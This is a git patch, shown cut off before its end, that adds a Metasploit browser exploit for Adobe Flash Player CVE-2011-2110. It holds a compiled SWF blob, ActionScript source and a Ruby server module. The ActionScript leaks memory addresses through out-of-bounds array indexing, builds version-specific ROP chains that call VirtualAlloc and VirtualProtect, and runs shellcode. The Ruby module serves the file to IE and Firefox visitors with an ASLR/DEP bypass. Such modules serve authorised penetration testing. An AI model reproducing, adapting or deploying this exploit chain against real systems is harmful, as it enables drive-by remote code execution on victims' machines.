From fcf42d3e7bcb1bc79308ca8396154dffc4f4083f Mon Sep 17 00:00:00 2001 From: Steven Seeley Date: Wed, 20 Jun 2012 12:52:37 +1000 Subject: [PATCH] added adobe flashplayer array indexing exploit (CVE-2011-2110) --- data/exploits/CVE-2011-2110.swf | Bin 0 -> 4615 bytes .../exploits/CVE-2011-2110/CVE-2011-2110.as | 558 ++++++++++++++++++ .../adobe_flashplayer_arrayindexing.rb | 178 ++++++ 3 files changed, 736 insertions(+) create mode 100644 data/exploits/CVE-2011-2110.swf create mode 100644 external/source/exploits/CVE-2011-2110/CVE-2011-2110.as create mode 100644 modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb 
diff --git a/data/exploits/CVE-2011-2110.swf b/data/exploits/CVE-2011-2110.swf new file mode 100644 index 0000000000000000000000000000000000000000..f9c79b5a60f01fd138db04800c022a715080e418 GIT binary patch literal 4615 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⪼|;X<%i zCgWUT< zA@>2Q{E3YFPLhw^mInx>UneZU@IjRD}JYNV8*7*`u zk1?CMz7j61^tDh3{*8lm4E#p85IiCjf=BJ3C0qy|6AHm^?cj0YLhyu82>#s;ekWWA zelHY)KX8x_(LaO>!5>lOPh!#kBs^H@XI_c-z%RmumHsIdf+so1d!R#s_SmNig3E4sH=H1aB1z!Q1TM z?ZSoN9YP^^CkN-SJhuuLf?Yx(*lh>52^WHQ35DR@cJLnILhxRp5WLS0{!X|Myk95; zx7)!T!iC@iLLvB|9sIp;A^4C`2>!tiJ}g`a{!u6dAF+dv3KxQp35DR}cJK+|LhwnU z5PZrGJ}q1bJ|h%@&)UJ~gbTsvg+g$r9sHAUA^3t&2>zLabJBou}i zFAEofuLyah#R$a|$ZXDd?$l3Yx>uDO}bGrKi!QRaoCC>|o@3 z1%9|!E%C!@W3t}AJdoKWP@H+2QRPpDGo3A>9H;E9 z|4$QQ@!ckHZ02^Mu<{-Msq&oy$I4rU!pdE!l8difc#zvB6moZ=N-n;;g$KENghK9K zRQ(srdC_z}88g~MQn3 0 || browser.toLowerCase().indexOf("firefox") > 0)) + { + // Error! + error_arr.uncompress(); + } + + // If it is a 64 bits process or is embedded in a PDF or if the Flash version is an un-official version (debug version) + // http://help.adobe.com/en_US/AS2LCR/Flash_10.0/00000896.html + if (Capabilities.isDebugger || Capabilities.supports64BitProcesses || Capabilities.isEmbeddedInAcrobat) + { + // Error! + error_arr.uncompress(); + } + + // Create the URLDownloader object + var url_str:* = String(t_url); + loader = new URLLoader(); + loader.dataFormat = URLLoaderDataFormat.BINARY; + loader.addEventListener(Event.COMPLETE, onLoadComplete); + loader.load(new URLRequest(t_url.toString())); + return; + } + + // Converts from an hex string to binary representation + public function hexToBin(param1:String) : ByteArray + { + var _loc_2:String = null; + var _loc_3:* = new ByteArray(); + var _loc_4:* = param1.length; + var _loc_5:uint = 0; + _loc_3.endian = Endian.LITTLE_ENDIAN; + while (_loc_5 < _loc_4) + { + _loc_2 = param1.charAt(_loc_5) + param1.charAt((_loc_5 + 1)); + _loc_3.writeByte(parseInt(_loc_2, 16)); + _loc_5 = _loc_5 + 2; + } + return _loc_3; + } + + // the exploitation function + public function exploit(... 
args) : void + { + var _loc_8:uint = 0; + + // First leak + // this leak gets the baseaddress of Flash10s.ocx + var n1:Number= new Number(parseFloat(String(args[1073741841]))); + var _loc_3:* = new ByteArray(); + _loc_3.position = 0; + _loc_3.writeDouble(n1); + var _loc_4:* = _loc_3[0] * 16777216 + _loc_3[1] * 65536 + _loc_3[2] * 256 + _loc_3[3]; + + // Base address + this.baseaddr = _loc_4; + this.code.position = 0; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeInt((this.pobj - 1) + 16 + 1024 * 4 * 100); + this.code.endian = Endian.BIG_ENDIAN; + this.code.writeUnsignedInt(0x41424344); + this.code.writeUnsignedInt(0x41424344); + this.code.writeUnsignedInt(0x45464748); + + // With this loop, we store the 0x41414141 in the stack + _loc_8 = 0; + while (_loc_8 < 1024 * 100) + { + this.code.writeUnsignedInt(0x41414141); + _loc_8 = _loc_8 + 1; + } + + // Test for the vulnerable versions of Flash + // Different test are done to calculate the ROP gadgets for every vulnerable version + if (Capabilities.version.toLowerCase() == "win 10,3,181,14" || Capabilities.version.toLowerCase() == "win 10,3,181,22" || Capabilities.version.toLowerCase() == "win 10,3,181,23") + { + if (Capabilities.version.toLowerCase() == "win 10,3,181,14") + { + if (Capabilities.playerType.toLowerCase() == "activex") + { + this.xchg_eax_esp_ret = this.baseaddr - 4147053; + this.xchg_eax_esi_ret = this.baseaddr - 3142921; + this.pop_eax_ret = this.baseaddr - 4217672; + this.VirtualAlloc = this.baseaddr + 681970 + 52; + this.jmp_eax = this.baseaddr - 4189983; + this.pop_ecx = this.baseaddr - 4217760; + this.mov_eax_ecx = this.baseaddr - 3903324; + this.inc_eax_ret = this.baseaddr - 4217676; + this.dec_eax_ret = this.baseaddr - 3914790; + this.to_eax = this.baseaddr - 3857175; + this.virtualprotect = this.baseaddr + 681970; + } + if (Capabilities.playerType.toLowerCase() == "plugin") + { + this.xchg_eax_esp_ret = this.baseaddr - 4070001; + this.xchg_eax_esi_ret = this.baseaddr - 3066633; + 
this.pop_eax_ret = this.baseaddr - 4140104; + this.VirtualAlloc = this.baseaddr + 681682; + this.jmp_eax = this.baseaddr - 4112415; + this.pop_ecx = this.baseaddr - 4140192; + this.mov_eax_ecx = this.baseaddr - 3826124; + this.inc_eax_ret = this.baseaddr - 4140108; + this.dec_eax_ret = this.baseaddr - 3988570; + this.to_eax = this.baseaddr - 3779959; + this.virtualprotect = this.baseaddr + 681434; + } + if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex")) + { + this.code.uncompress(); + } + } + if (Capabilities.version.toLowerCase() == "win 10,3,181,22") + { + if (Capabilities.playerType.toLowerCase() == "activex") + { + this.code.uncompress(); + } + if (Capabilities.playerType.toLowerCase() == "plugin") + { + this.xchg_eax_esp_ret = this.baseaddr - 4070081; + this.xchg_eax_esi_ret = this.baseaddr - 3066633; + this.pop_eax_ret = this.baseaddr - 4140184; + this.VirtualAlloc = this.baseaddr + 681602; + this.jmp_eax = this.baseaddr - 4112495; + this.pop_ecx = this.baseaddr - 4140272; + this.mov_eax_ecx = this.baseaddr - 3826412; + this.inc_eax_ret = this.baseaddr - 4140188; + this.dec_eax_ret = this.baseaddr - 3988622; + this.to_eax = this.baseaddr - 3780231; + this.virtualprotect = this.baseaddr + 681354; + } + if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex")) + { + this.code.uncompress(); + } + } + if (Capabilities.version.toLowerCase() == "win 10,3,181,23") + { + if (Capabilities.playerType.toLowerCase() == "activex") + { + this.xchg_eax_esp_ret = this.baseaddr - 4147431; + this.xchg_eax_esi_ret = this.baseaddr - 3143049; + this.pop_eax_ret = this.baseaddr - 4218184; + this.VirtualAlloc = this.baseaddr + 681510; + this.jmp_eax = this.baseaddr - 4190495; + this.pop_ecx = this.baseaddr - 4218272; + this.mov_eax_ecx = this.baseaddr - 3903692; + this.inc_eax_ret = this.baseaddr - 4218188; + this.dec_eax_ret = this.baseaddr - 3915158; + this.to_eax = 
this.baseaddr - 3857511; + this.virtualprotect = this.baseaddr + 681458; + } + if (Capabilities.playerType.toLowerCase() == "plugin") + { + this.code.uncompress(); + } + if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex")) + { + this.code.uncompress(); + } + } + } + else + { + this.code.uncompress(); + } + + // rop + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian 
= Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.inc_eax_ret + 1)); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.pop_ecx); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.xchg_eax_esp_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.xchg_eax_esi_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.pop_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.VirtualAlloc); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.jmp_eax); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.pop_ecx); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(0); + this.code.endian = 
Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(131072); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(4096); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(64); + this.code.endian = Endian.BIG_ENDIAN; + this.code.writeUnsignedInt(2421721856); + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.mov_eax_ecx); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.pop_ecx); + this.code.endian = Endian.BIG_ENDIAN; + this.code.writeUnsignedInt(1435233421); + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.mov_eax_ecx); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.pop_ecx); + 
this.code.endian = Endian.BIG_ENDIAN; + this.code.writeUnsignedInt(1074135008); + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.mov_eax_ecx); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.inc_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + 
this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.dec_eax_ret); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.to_eax); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(this.virtualprotect); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(131072); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(64); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.pobj - 1) + 4); + this.code.endian = Endian.BIG_ENDIAN; + + // previous pe loader stub removed, just to be safe + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + this.code.writeUnsignedInt(0x90909090); + 
this.code.writeUnsignedInt(0x90909090); + + // shellcode + this.code.endian = Endian.BIG_ENDIAN; + this.code.writeBytes(this.content, 0, this.content.length); + + // Second leak + var _loc_5:Number = new Number(parseFloat(String(args[0x3FFFFFAD]))); + + var _loc_6:* = new ByteArray(); + _loc_6.position = 0; + _loc_6.writeDouble(_loc_5); + var _loc_7:* = _loc_6[0] * 16777216 + _loc_6[1] * 65536 + _loc_6[2] * 256 + _loc_6[3]; + this.pobj = _loc_7; + + _loc_8 = 0; + this.pobj = this.pobj + 0x37; + + // with this loop, we store a reference for the leaked address in the stack + _loc_8 = 0; + while (_loc_8 < 100) + { + this.code.writeInt(this.pobj); + _loc_8 = _loc_8 + 1; + } + + // third leak + var _loc_9:Number = new Number(parseFloat(String(args[0x3FFFFFB9]))); + var _leak_3:* = new ByteArray(); + _leak_3.position = 0; + _leak_3.writeDouble(_loc_9); + _loc_4 = _leak_3[0] * 16777216 + _leak_3[1] * 65536 + _leak_3[2] * 256 + _leak_3[3]; + this.pobj = _loc_4 + 2; + + // dont remove, the stack will change + ExternalInterface.call("", ""); + + // again, a reference to the leaked address is stored in the stack + _loc_8 = 0; + while (_loc_8 < 100) + { + this.code.writeInt(this.pobj); + _loc_8 = _loc_8 + 1; + } + + this.code.position = 0; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeInt((this.pobj - 1) + 16 + 1024 * 4 * 100); + this.code.endian = Endian.BIG_ENDIAN; + this.code.position = 409872; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt((this.pobj - 1) + 16 + 1024 * 4 * 100 + 292); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(131072); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = Endian.LITTLE_ENDIAN; + this.code.writeUnsignedInt(64); + this.code.endian = Endian.BIG_ENDIAN; + this.code.endian = 
Endian.LITTLE_ENDIAN;
+ this.code.writeUnsignedInt((this.pobj - 1) + 4);
+ this.code.endian = Endian.BIG_ENDIAN;
+
+ // This is the trigger.
+ Number(args[0x3FFFFFB9]);
+ return;
+ }
+ }
+}
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
new file mode 100644
index 0000000000..bc3632e370
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -0,0 +1,178 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23
+ and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
+ logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
+ vulnerability that was used for attacks against Korean based organisations.
+
+ Specifically, this issue occurs when indexing an array using an arbitrary value,
+ memory can be referenced and later executed. Taking advantage of this issue does not rely
+ on heap spraying as the vulnerability can also be used for information leakage.
+
+ Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several
+ other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and
+ is very reliable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'mr_me ', # msf exploit,
+ 'Unknown' # malware version seen used in targeted attacks
+ ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['CVE', '2011-2110'],
+ ['OSVDB', '48268'],
+ ['URL', 'http://www.adobe.com/devnet/swf.html'],
+ ['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],
+ ['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],
+ ['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'HTTP::compression' => 'gzip',
+ 'HTTP::chunked' => true,
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', {}],
+ ],
+ 'DisclosureDate' => 'Jun 21 2012',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ # src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
+ # full aslr/dep bypass using the info leak as per malware
+ path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-2110.swf" )
+ fd = File.open( path, "rb" )
+ @swf = fd.read(fd.stat.size)
+ fd.close
+ super
+ end
+
+ def check_dependencies
+ use_zlib
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ if agent =~ /MSIE/
+ return targets[0] # ie 6/7/8 tested working
+ elsif agent =~ /Firefox/
+ return targets[0] # ff 10.2 tested working
+ else
+ return nil
+ end
+ end
+
